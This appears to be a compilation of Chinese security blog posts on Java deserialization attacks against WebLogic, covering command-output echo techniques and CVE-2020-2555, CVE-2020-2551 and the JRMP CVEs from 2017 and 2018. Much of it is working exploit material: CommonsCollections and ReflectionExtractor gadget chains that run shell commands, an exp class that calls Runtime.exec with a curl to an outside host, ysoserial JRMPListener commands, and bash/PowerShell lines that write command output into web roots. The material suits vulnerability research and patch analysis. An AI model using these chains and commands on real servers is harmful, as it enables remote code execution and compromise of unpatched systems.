写在文前

在研究weblogic、fastjson、shiro反序列化漏洞时，多次遇到了回显问题，本文将从以下几种角度出发来分别探讨反序列化回显的问题，也感谢各位师傅们的反序列化回显研究。

1. defineClass
2. RMI绑定实例
3. URLClassLoader抛出异常
4. 中间件
5. 写文件css、js
6. dnslog

defineClass

先说defineClass这个东西是因为下面的几种方式都是在其基础上进行改进。defineClass归属于ClassLoader类，其主要作用就是使用编译好的字节码就可以定义一个类。

形如

package com.test.ClassLoader;

import java.lang.reflect.Method;

public class MyClassLoader extends ClassLoader {
    private static String myClassName = "com.test.ClassLoader.HelloWorld";
    private static byte[] bs = new byte[]{
        -54, -2, -70, -66, 0, 0, 0, 52, 0, 36, 10, 0, 7, 0, 22, 9, 0, 23, 0, 24, 8, 0, 25, 10, 0, 26, 0, 27, 8, 0, 19, 7, 0, 28, 7, 0, 29, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 33, 76, 99, 111, 109, 47, 116, 101, 115, 116, 47, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114, 47, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 59, 1, 0, 4, 109, 97, 105, 110, 1, 0, 22, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 4, 97, 114, 103, 115, 1, 0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 4, 116, 101, 115, 116, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 15, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 46, 106, 97, 118, 97, 12, 0, 8, 0, 9, 7, 0, 30, 12, 0, 31, 0, 32, 1, 0, 5, 72, 101, 108, 108, 111, 7, 0, 33, 12, 0, 34, 0, 35, 1, 0, 31, 99, 111, 109, 47, 116, 101, 115, 116, 47, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114, 47, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 3, 111, 117, 116, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 83, 116, 114, 101, 97, 109, 1, 0, 7, 112, 114, 105, 110, 116, 108, 110, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 0, 33, 0, 6, 0, 7, 0, 0, 0, 0, 0, 3, 0, 1, 0, 8, 0, 9, 0, 1, 0, 10, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 11, 0, 0, 0, 6, 0, 1, 0, 0, 0, 3, 0, 12, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 13, 0, 14, 0, 0, 0, 9, 0, 15, 0, 16, 0, 1, 0, 10, 0, 0, 0, 55, 0, 2, 0, 1, 0, 0, 0, 9, -78, 0, 2, 18, 3, -74, 0, 4, -79, 0, 0, 0, 2, 0, 11, 0, 0, 0, 10, 0, 2, 0, 0, 0, 5, 0, 8, 0, 6, 0, 12, 0, 0, 0, 12, 0, 1, 0, 0, 0, 9, 0, 17, 0, 18, 0, 0, 0, 9, 0, 19, 0, 9, 0, 1, 0, 10, 0, 0, 0, 37, 0, 2, 0, 0, 0, 0, 0, 9, -78, 0, 2, 18, 5, -74, 0, 4, -79, 0, 0, 0, 1, 0, 11, 0, 0, 0, 10, 0, 2, 0, 0, 0, 8, 0, 8, 0, 9, 0, 1, 0, 20, 0, 0, 0, 2, 0, 21,
    };

    public static void main(String[] args) {
        try {
            MyClassLoader loader = new MyClassLoader();
            Class helloClass = loader.loadClass(myClassName);
            Object obj = helloClass.newInstance();
            Method method = obj.getClass().getMethod("test");
            method.invoke(null);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    protected Class<?> findClass(String name) throws ClassNotFoundException {
        if (name == myClassName) {
            System.out.println("加载" + name + "类");
            return defineClass(myClassName, bs, 0, bs.length);
        }
        return super.findClass(name);
    }

}

RMI绑定实例

之前写过一篇 《Weblogic使用ClassLoader和RMI来回显命令执行结果》，其中提到了使用commons-collection反射调用defineClass，通过defineClass定义的恶意命令执行字节码来绑定RMI实例，接着通过RMI调用绑定的实例拿到回显结果。其中最关键的代码就下面几行

// common-collection1 构造transformers 定义自己的RMI接口
Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(DefiningClassLoader.class),
        new InvokerTransformer("getDeclaredConstructor",
            new Class[] { Class[].class }, new Object[] { new Class[0] }),
        new InvokerTransformer("newInstance",
            new Class[] { Object[].class },
            new Object[] { new Object[0] }),
        new InvokerTransformer("defineClass",
            new Class[] { String.class, byte[].class },
            new Object[] { className, classBytes }),
        new InvokerTransformer("getMethod",
            new Class[] { String.class, Class[].class },
            new Object[] { "main", new Class[] { String[].class } }),
        new InvokerTransformer("invoke",
            new Class[] { Object.class, Object[].class },
            new Object[] { null, new Object[] { null } }),
        new ConstantTransformer(new HashSet())
};

使用cc链进行反射调用，其中className为恶意命令执行类，形如com.test.payload.RemoteImpl，继承自Remote接口的实现，classBytes为该类字节码数组，将该类对象绑定在rmi://127.0.0.1:1099/Hello实例上，进而通过JNDI调用Hello即可。

URLClassLoader抛出异常

通过将回显结果封装到异常信息抛出拿到回显。

首先写一下执行命令的类

import java.io.*;
import java.nio.charset.Charset;

public class ProcessExec {
    public ProcessExec(String cmd) throws Exception {
        InputStream stream = (new ProcessBuilder(new String[]{"cmd.exe", "/c", cmd})).start().getInputStream();
        InputStreamReader streamReader = new InputStreamReader(stream, Charset.forName("gbk"));
        BufferedReader bufferedReader = new BufferedReader(streamReader);
        StringBuffer buffer = new StringBuffer();
        String line = null;

        while((line = bufferedReader.readLine()) != null) {
            buffer.append(line).append("\n");
        }

        throw new Exception(buffer.toString());
    }
}

打jar包

javac ProcessExec.java
jar -cvf p.jar ProcessExec.class

使用URLClassLoader加载jar获得回显

package payload;

import java.lang.reflect.Constructor;
import java.net.URL;
import java.net.URLClassLoader;

public class URLClassloader {
    public static void main(String[] args) throws Exception {
        URL url = new URL("http://127.0.0.1/p.jar");
        URL[] urls = {url};
        URLClassLoader urlClassLoader = URLClassLoader.newInstance(urls);
        Constructor<?> processExec = urlClassLoader.loadClass("ProcessExec").getConstructor(String.class);
        processExec.newInstance("ipconfig");

    }
}

使用URLClassLoader的部份可以通过cc链反射去做

package payload;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.Map;

class CommonsCollections5URLClassLoader {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(URLClassLoader.class),
                // 获取构造方法
                new InvokerTransformer("getConstructor",
                        new Class[]{Class[].class},
                        new Object[]{new Class[]{java.net.URL[].class}}),
                // new实例并赋值url
                new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[]{new URL[]{new URL("http://127.0.0.1/p.jar")}}}),
                // loadClass加载ProcessExec
                new InvokerTransformer("loadClass", new Class[]{String.class}, new Object[]{"ProcessExec"}),
                // 获取ProcessExec的构造方法
                new InvokerTransformer("getConstructor", new Class[]{Class[].class}, new Object[]{new Class[]{String.class}}),
                // 实例化ProcessExec
                new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new String[]{"ipconfig"}})

        };
        Transformer chain = new ChainedTransformer(transformers);
        Map map = new HashMap();
        Map lazyMap = LazyMap.decorate(map, chain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "");
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(entry);
        Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
        field.setAccessible(true);
        field.set(badAttributeValueExpException, entry);

        serialize(badAttributeValueExpException);
        deserialize();
    }

    public static void serialize(Object obj) {
        try {
            ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("test.ser"));
            os.writeObject(obj);
            os.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void deserialize() {
        try {
            ObjectInputStream is = new ObjectInputStream(new FileInputStream("test.ser"));
            is.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

这个例子大多出现在jboss和fastjson中，灵活使用。

中间件回显

中间件而言多数重写了thread类，在thread中保存了req和resp，可以通过获取当前线程，在resp中写入回显结果

这种方法前几天在先知上有很多针对tomcat无回显的文章，为各位师傅的文章画一下时间线：

1. 《基于内存 Webshell 的无文件攻击技术研究》 主要应用于Spring
2. 《linux下java反序列化通杀回显方法的低配版实现》 将回显结果写入文件操作符
3. 《Tomcat中一种半通用回显方法》 将执行命令的结果存入tomcat的response返回 shiro无法回显
4. 《基于tomcat的内存 Webshell 无文件攻击技术》 动态注册filter实现回显 shiro无法回显
5. 《基于全局储存的新思路 | Tomcat的一种通用回显方法研究》 通过Thread.currentThread.getContextClassLoader() 拿到request、response回显 tomcat7中获取不到StandardContext
6. 《tomcat不出网回显连续剧第六集》 直接从Register拿到process对应的req

不再赘述了，具体实现文章都有了。值得一提的思路可能就是反序列化不仅仅可以回显，也可以配合反射和字节码动态注册servlet实现无内存webshell。

在weblogic中也有resp回显，具体代码在 《weblogic_2019_2725poc与回显构造》 lufei师傅已经给出来了

weblogic10.3.6

String lfcmd = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader("lfcmd");
weblogic.servlet.internal.ServletResponseImpl response = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
weblogic.servlet.internal.ServletOutputStreamImpl outputStream = response.getServletOutputStream();
outputStream.writeStream(new weblogic.xml.util.StringInputStream(lfcmd));
outputStream.flush();
response.getWriter().write("");

weblogic12.1.3

java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)this.getCurrentWork()).getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
HttpConnectionHandler httpConn = (HttpConnectionHandler) field.get(this.getCurrentWork());
httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream("xxxxxx"));

写文件

通过搜索特殊文件路径直接写入web可访问的目录，要熟悉常用中间件容器的目录结构，比如在我web目录有一个特殊的test.html

linux用bash

// 进入test.html的根目录并执行id命令写入1.txt
cd $(find -name "test.html" -type f -exec dirname {} \; | sed 1q) && echo `id` > 1.txt

windows的powershell

$file = Get-ChildItem -Path . -Filter test.html -recurse -ErrorAction SilentlyContinue;$f = -Join($file.DirectoryName,"/a.txt");echo 222 |Out-File $f

dnslog

这个就不提了，技巧的话就是用powershell或者base64命令编码一下，避免特殊字符，还有就是挑小众的dnslog平台。

参考

1. https://www.cnblogs.com/afanti/p/12502145.html
2. https://xz.aliyun.com/t/5299
3. https://javasec.org/javase/ClassLoader/
4. https://www.cnblogs.com/ph4nt0mer/p/12802851.html

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

2020.03.06 早上4点，看到了清水川崎师傅推送了Weblogic CVE-2020-2555的通告，在推特上搜了一波，发现有详细的分析文章，遂有此文。

漏洞分析

个人研究，没钱买补丁，这里借用Zero Day的图。

补丁中将LimitFilter类的toString()方法中的extract()方法调用全部移除，而我们需要知道在CommonsCollections5中可以利用BadAttributeValueExpException来调用任意类的toString()方法。

接着来看下没打补丁之前LimitFilter类的toString()方法。

public String toString() {
    StringBuilder sb = new StringBuilder("LimitFilter: (");
    sb.append(this.m_filter).append(" [pageSize=").append(this.m_cPageSize).append(", pageNum=").append(this.m_nPage);
    if (this.m_comparator instanceof ValueExtractor) {
        ValueExtractor extractor = (ValueExtractor)this.m_comparator;
        sb.append(", top=").append(extractor.extract(this.m_oAnchorTop)).append(", bottom=").append(extractor.extract(this.m_oAnchorBottom));
    } else if (this.m_comparator != null) {
        sb.append(", comparator=").append(this.m_comparator);
    }

    sb.append("])");
    return sb.toString();
}

toString()中会将this.m_oAnchorTop和this.m_oAnchorBottom作为参数传入ValueExtractor.extract()，补丁移除了extractor.extract()操作，跟进extract()看下，发现extract()只是一个抽象方法，并没有实现，那说明extract()在ValueExtractor的子类中可以利用。因为是反序列化，所以我们只需要在ValueExtractor子类中找到实现了Serializable或者ExternalizableLite反序列化接口并且有extract()的方法。最终在com.tangosol.util.extractor.ReflectionExtractor#extract()找到了反射任意方法调用。

public E extract(T oTarget) {
    if (oTarget == null) {
        return null;
    } else {
        Class clz = oTarget.getClass();

        try {
            Method method = this.m_methodPrev;
            if (method == null || method.getDeclaringClass() != clz) {
                this.m_methodPrev = method = ClassHelper.findMethod(clz, this.getMethodName(), ClassHelper.getClassArray(this.m_aoParam), false);
            }

            return method.invoke(oTarget, this.m_aoParam);
        } catch (NullPointerException var4) {
            throw new RuntimeException(this.suggestExtractFailureCause(clz));
        } catch (Exception var5) {
            throw ensureRuntimeException(var5, clz.getName() + this + '(' + oTarget + ')');
        }
    }
}

到现在为止我们可以传入一个Runtime.getRuntime()的oTarget，将this.m_methodPrev赋值为exec，然后this.m_aoParam就是我们的命令参数，就可以RCE了。而对于反序列化而言，我们需要继续构建对象，让他自己执行Runtime.getRuntime()，这里很像cc链中的InvokerTransformer.transform()，那有没有像cc链中的ChainedTransformer类呢。遂找到了com.tangosol.util.extractor.ChainedExtractor#extract()

@JsonbCreator
public ChainedExtractor(@JsonbProperty("extractors") ValueExtractor[] aExtractor) {
    super(aExtractor);
    this.m_nTarget = this.computeTarget();
}
public E extract(Object oTarget) {
    ValueExtractor[] aExtractor = this.getExtractors();
    int i = 0;

    for(int c = aExtractor.length; i < c && oTarget != null; ++i) {
        oTarget = aExtractor[i].extract(oTarget);
    }

    return oTarget;
}

和cc5的构造很像，我们一步一步构造下

// Runtime.class.getRuntime()
ReflectionExtractor extractor1 = new ReflectionExtractor(
    "getMethod",
    new Object[]{"getRuntime", new Class[0]}

);

// get invoke() to execute exec()
ReflectionExtractor extractor2 = new ReflectionExtractor(
    "invoke",
    new Object[]{null, new Object[0]}

);

// invoke("exec","calc")
ReflectionExtractor extractor3 = new ReflectionExtractor(
    "exec",
    new Object[]{new String[]{"/bin/bash", "-c", "curl http://172.16.1.1/success"}}
);

首先先构造三个ReflectionExtractor对象来调用反射拿到我们想要的，然后把他放到ReflectionExtractor数组中，将数组通过构造函数赋值给ChainedExtractor。

ReflectionExtractor[] extractors = {
    extractor1,
    extractor2,
    extractor3,
};

ChainedExtractor chainedExtractor = new ChainedExtractor(extractors);

那到目前为止，只要反序列化执行了chainedExtractor.extract()就可以造成rce。而前文所说，toString()中是执行了extract()的，所以我们将chainedExtractor通过反射赋值给limitFilter对象。然后通过BadAttributeValueExpException触发limitFilter对象的toString()，进而触发extract()一步一步调用method.invoke()，继而通过反射拿到Runtime.getRuntime().exec("")，达成RCE。

坑

1. coherence.jar要使用和目标版本一致的，不然会有serialVersionUID不一致的问题。
2. BadAttributeValueExpException对jdk的版本有要求。具体看这里

漏洞利用

https://github.com/Y4er/CVE-2020-2555

参考

1. https://www.zerodayinitiative.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server
2. https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR76
3. https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections5.java

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

环境

weblogic10.3.6+jdk1.6
idea+jdk1.8+jdk1.6

IIOP

IIOP，Internet Inter-ORB Protocol(互联网内部对象请求代理协议)，它是一个用于CORBA 2.0及兼容平台上的协议；用来在CORBA对象请求代理之间交流的协议。Java中使得程序可以和其他语言的CORBA实现互操作性的协议。

RMI-IIOP出现以前，只有RMI和CORBA两种选择来进行分布式程序设计，二者之间不能协作。RMI-IIOP综合了RMI 和CORBA的优点，克服了他们的缺点，使得程序员能更方便的编写分布式程序设计，实现分布式计算。RMI-IIOP综合了RMI的简单性和CORBA的多语言性兼容性，RMI-IIOP克服了RMI只能用于Java的缺点和CORBA的复杂性。

在Weblogic中，默认启用了IIOP，而IIOP的传输也是通过序列化和反序列化的形式来进行的。在Weblogic中RMI-IIOP模型可以借用奇安信观星实验室的一张图来说明

IIOP样例

先来看一个简单的RMI-IIOP样例，具体代码可以看 https://github.com/longofo/rmi-jndi-ldap-jrmp-jmx-jms

package com.longofo.example;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.util.Hashtable;

public class HelloServer {
    public final static String JNDI_FACTORY = "com.sun.jndi.cosnaming.CNCtxFactory";

    public static void main(String[] args) {
        try {
            System.setProperty("java.rmi.server.codebase", "http://127.0.0.1:8000/");
            //实例化Hello servant
            HelloImpl helloRef = new HelloImpl();

            //使用JNDI在命名服务中发布引用
            InitialContext initialContext = getInitialContext("iiop://127.0.0.1:1050");
            initialContext.rebind("HelloService", helloRef);

            System.out.println("Hello Server Ready...");

            Thread.currentThread().join();
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }

    private static InitialContext getInitialContext(String url) throws NamingException {
        Hashtable env = new Hashtable();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }
}

Server端通过InitialContext拿到上下文，然后注册一个HelloService对应helloRef引用，而HelloImpl又实现了HelloInterface接口，其中有一个sayHello方法并且继承java.rmi.Remote抛出java.rmi.RemoteException，这部分其实和RMI是大同小异的，在我的其他文章中介绍过了RMI，这里不再赘述。

漏洞分析

现在我们来看这个漏洞。IIOP传输的过程中会自动序列化和反序列化，那么我们可以通过向服务器7001端口发送一个恶意的序列化对象，IIOP达到RCE。

发送恶意序列化对象的过程，其实就是bind的过程，由此我们可以构造请求

Hashtable<String, String> env = new Hashtable<String, String>();
// add wlsserver/server/lib/weblogic.jar to classpath,else will error.
env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
env.put("java.naming.provider.url", rhost);
Context context = new InitialContext(env);
// get Object to Deserialize
JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
jtaTransactionManager.setUserTransactionName(rmiurl);

Remote remote = createMemoitizedProxy(createMap("pwned"+System.nanoTime(), jtaTransactionManager), Remote.class);
context.rebind("Y4er"+System.nanoTime(), remote);

你肯定疑惑JtaTransactionManager和weblogic.jndi.WLInitialContextFactory是从哪来的？

1. JtaTransactionManager是spring爆出的一个可以JDNI注入的类，在weblogic中也存在。
2. weblogic.jndi.WLInitialContextFactory 是weblogic的JDNI工厂类。

国际惯例，跟一下流程，IIOP解析数据流的部分看不懂不跟了，从IIOP开始反序列化对象开始

E:/source/java/Weblogic/src/main/resources/lib/modules/weblogic.jar!/weblogic/iiop/IIOPInputStream.class:1725

此时var2是序列化传入的com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager，跟进readValue()

跟进readValueData()，判断是否有readObject方法之后进入自身的readObject()，也就是om.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager的readObject

然后通过反射调用JtaTransactionManager的readObject()，跟进

到此之后就是Weblogic的CVE-2018-3191 spring JDNI注入了，简单来说就是lookup()的参数可控，导致可以加载任意类。我们继续跟进initUserTransactionAndTransactionManager()

如果userTransaction等于空有userTransactionName属性则进入lookupUserTransaction()，跟进

此时lookup()参数可控

lookup加载我们的RMI服务，可以注入恶意ip的rmi服务，触发实例化恶意类构造方法调用。如果不明白请参考文末的《Spring framework 反序列化的漏洞》以及《weblogic之CVE-2018-3191漏洞分析》。

漏洞利用

Github：https://github.com/Y4er/CVE-2020-2551

下载jar包，然后使用marshalsec起一个恶意的RMI服务，本地编译一个exp.java

package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

尽量使用和weblogic相同的版本编译 然后本地起一个web服务器

python -m http.server --bind 0.0.0.0 80

命令行运行jar包

java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

实际效果如图

参考链接

1. https://paper.seebug.org/1130
2. https://seaii-blog.com/index.php/2019/12/29/92.html
3. https://www.anquanke.com/post/id/197605
4. https://www.cnblogs.com/afanti/p/10256843.html
5. https://www.cnblogs.com/afanti/p/10193169.html
6. https://github.com/Y4er/CVE-2020-2551
7. https://github.com/longofo/rmi-jndi-ldap-jrmp-jmx-jms
8. https://paper.seebug.org/1105/
9. https://paper.seebug.org/1091/

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

JRMP是Java使用的另一种数据传输协议，在前文中提到了传输过程中会自动序列化和反序列化，因此weblogic出现了一系列的漏洞，即CVE-2017-3248、CVE-2018-2628、CVE-2018-2893、CVE-2018-3245，众所周知weblogic打补丁的形式为黑名单，所以CVE-2017-3248之后的洞都为黑名单绕过，本文逐一讲解。

CVE-2017-3248

复现

因为本机没有python2，就直接在虚拟机里复现了。使用ysoserial监听JRMP服务

./Oracle/Middleware/jdk160_29/jre/bin/java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8080 CommonsCollections1 'touch /tmp/success'

下载python版exp脚本 ，运行

python 44553.py 172.16.2.129 7001 ./ysoserial.jar 172.16.2.129 8080 JRMPClient

成功创建/tmp/success文件

分析

JRMP在前文中提到了在传输过程中也会自动序列化和反序列化，那么我们可以构造一个gadgets，通过T3协议让weblogic自动请求我们的JRMPListener，然后JRMPListener返回给他一个恶意的gadgets对象，weblogic自动反序列化恶意对象，达到rce。

过程如图

整个构造需要两步
1. 构造T3协议的payload，让weblogic请求我们的JRMP -> 复现中的python脚本
2. 构造JRMPListener返回的gadgets -> 复现时监听JRMPListener

看下python脚本，发现脚本中是使用ysoserial生成payload.out，然后读出hex构造t3发包

看下JRMPClient.java的代码

利用java.rmi.registry.Registry，序列化RemoteObjectInvocationHandler，并使用UnicastRef和远端建立tcp连接，获取RMI registry，序列化之后发送给weblogic，weblogic会请求我们的JRMPListener，然后将获取的内容利用readObject()进行解析，导致恶意代码执行。

改造weblogic_cmd

BypassPayloadSelector.java

public static Object selectBypass(Object payload) throws Exception {

    if (Main.TYPE.equalsIgnoreCase("marshall")) {
        payload = marshalledObject(payload);
    } else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) {
        payload = streamMessageImpl(Serializables.serialize(payload));
    }else if(Main.TYPE.equalsIgnoreCase("JRMPListener")){
        payload = JRMPListener(cmdLine.getOptionValue("H")+":"+ cmdLine.getOptionValue("P"));
    }
    return payload;
}

public static Registry JRMPListener(String command) throws Exception {

    String host;
    int port;
    int sep = command.indexOf(':');
    if (sep < 0) {
        port = new Random().nextInt(65535);
        host = command;
    } else {
        host = command.substring(0, sep);
        port = Integer.valueOf(command.substring(sep + 1));
    }
    ObjID id = new ObjID(new Random().nextInt()); // RMI registry
    TCPEndpoint te = new TCPEndpoint(host, port);
    UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
    RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
    Registry proxy = (Registry) Proxy.newProxyInstance(BypassPayloadSelector.class.getClassLoader(), new Class[]{
        Registry.class
            }, obj);
    return proxy;
}

weblogic_cmd是一个很方便发送t3协议数据的工具，改了改通过参数-T来指定JRMPClient，加了一个JRMPClient方法，仍然需要用ysoserial.jar监听JRMPListener。

java -cp yso.jar ysoserial.exploit.JRMPListener 8080 CommonsCollections1 "curl http://172.16.1.1/"

CVE-2018-2628

先看CVE-2017-3248的补丁

protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
    String[] arr$ = interfaces;
    int len$ = interfaces.length;

    for(int i$ = 0; i$ < len$; ++i$) {
        String intf = arr$[i$];
        if (intf.equals("java.rmi.registry.Registry")) {
            throw new InvalidObjectException("Unauthorized proxy deserialization");
        }
    }

    return super.resolveProxyClass(interfaces);
}

思路一：resolveProxyClass反序列化代理类才会调用，直接反序列化UnicastRef对象，调用sum.rmi.server.UnicastRef#readExternal。

public Registry getObject(final String command) throws Exception {

    String host;
    int port;
    int sep = command.indexOf(':');
    if (sep < 0) {
        port = new Random().nextInt(65535);
        host = command;
    } else {
        host = command.substring(0, sep);
        port = Integer.valueOf(command.substring(sep + 1));
    }
    ObjID id = new ObjID(new Random().nextInt()); // RMI registry
    TCPEndpoint te = new TCPEndpoint(host, port);
    UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
    return ref;
}

这样绕过之后补丁把UnicastRef加入了黑名单。

思路二：使用java.rmi.registry.Registry之外的类。廖新喜用的java.rmi.activation.Activator

public Registry getObject(final String command) throws Exception {
    String host;
    int port;
    int sep = command.indexOf(':');
    if (sep < 0) {
        port = new Random().nextInt(65535);
        host = command;
    } else {
        host = command.substring(0, sep);
        port = Integer.valueOf(command.substring(sep + 1));
    }
    ObjID id = new ObjID(new Random().nextInt()); // RMI registry
    TCPEndpoint te = new TCPEndpoint(host, port);
    UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
    RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
    Activator proxy = (Activator) Proxy.newProxyInstance(JRMPClient3.class.getClassLoader(), new Class[] {
        Activator.class
            }, obj);
    return proxy;
}

CVE-2018-2893

由于weblogic一直没有处理streamMessageImpl，导致CVE-2016-0638 + CVE-2018-2628 = CVE-2018-2893，用streamMessageImpl封装一下而已。

CVE-2018-3245

RMIConnectionImpl_Stub代替RemoteObjectInvocationHandler，实际上就是找RemoteObject类的子类。https://github.com/pyn3rd/CVE-2018-3245

总结

一切罪恶的源头都是T3协议，weblogic还是禁用T3协议为好。weblogic黑名单补丁总是治标不治本，无奈的是补丁需要付费才能下载到。

参考

1. https://www.cnblogs.com/afanti/p/10256840.html
2. https://seaii-blog.com/index.php/2019/12/29/92.html
3. https://github.com/pyn3rd/CVE-2018-2893
4. https://mp.weixin.qq.com/s/ohga7Husc9ke5UYuqR92og
5. 廖新喜 CVE-2018-2628 简单复现与分析

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

复现

https://github.com/5up3rc/weblogic_cmd 修改payload类型

成功执行命令，断点同样下在InvokerTransformer的transform()，堆栈如下。

transform:123, InvokerTransformer (org.apache.commons.collections.functors)
transform:122, ChainedTransformer (org.apache.commons.collections.functors)
get:157, LazyMap (org.apache.commons.collections.map)
invoke:50, AnnotationInvocationHandler (sun.reflect.annotation)
entrySet:-1, $Proxy57
readObject:327, AnnotationInvocationHandler (sun.reflect.annotation)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:39, NativeMethodAccessorImpl (sun.reflect)
invoke:25, DelegatingMethodAccessorImpl (sun.reflect)
invoke:597, Method (java.lang.reflect)
invokeReadObject:974, ObjectStreamClass (java.io)
readSerialData:1848, ObjectInputStream (java.io)
readOrdinaryObject:1752, ObjectInputStream (java.io)
readObject0:1328, ObjectInputStream (java.io)
readObject:350, ObjectInputStream (java.io)
readResolve:58, MarshalledObject (weblogic.corba.utils)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:39, NativeMethodAccessorImpl (sun.reflect)
invoke:25, DelegatingMethodAccessorImpl (sun.reflect)
invoke:597, Method (java.lang.reflect)
invokeReadResolve:1061, ObjectStreamClass (java.io)
readOrdinaryObject:1761, ObjectInputStream (java.io)
readObject0:1328, ObjectInputStream (java.io)
readObject:350, ObjectInputStream (java.io)
readObject:69, InboundMsgAbbrev (weblogic.rjvm)
read:41, InboundMsgAbbrev (weblogic.rjvm)
readMsgAbbrevs:283, MsgAbbrevJVMConnection (weblogic.rjvm)
init:215, MsgAbbrevInputStream (weblogic.rjvm)
dispatch:498, MsgAbbrevJVMConnection (weblogic.rjvm)
dispatch:330, MuxableSocketT3 (weblogic.rjvm.t3)
dispatch:394, BaseAbstractMuxableSocket (weblogic.socket)
readReadySocketOnce:960, SocketMuxer (weblogic.socket)
readReadySocket:897, SocketMuxer (weblogic.socket)
processSockets:130, PosixSocketMuxer (weblogic.socket)
run:29, SocketReaderRequest (weblogic.socket)
execute:42, SocketReaderRequest (weblogic.socket)
execute:145, ExecuteThread (weblogic.kernel)
run:117, ExecuteThread (weblogic.kernel)

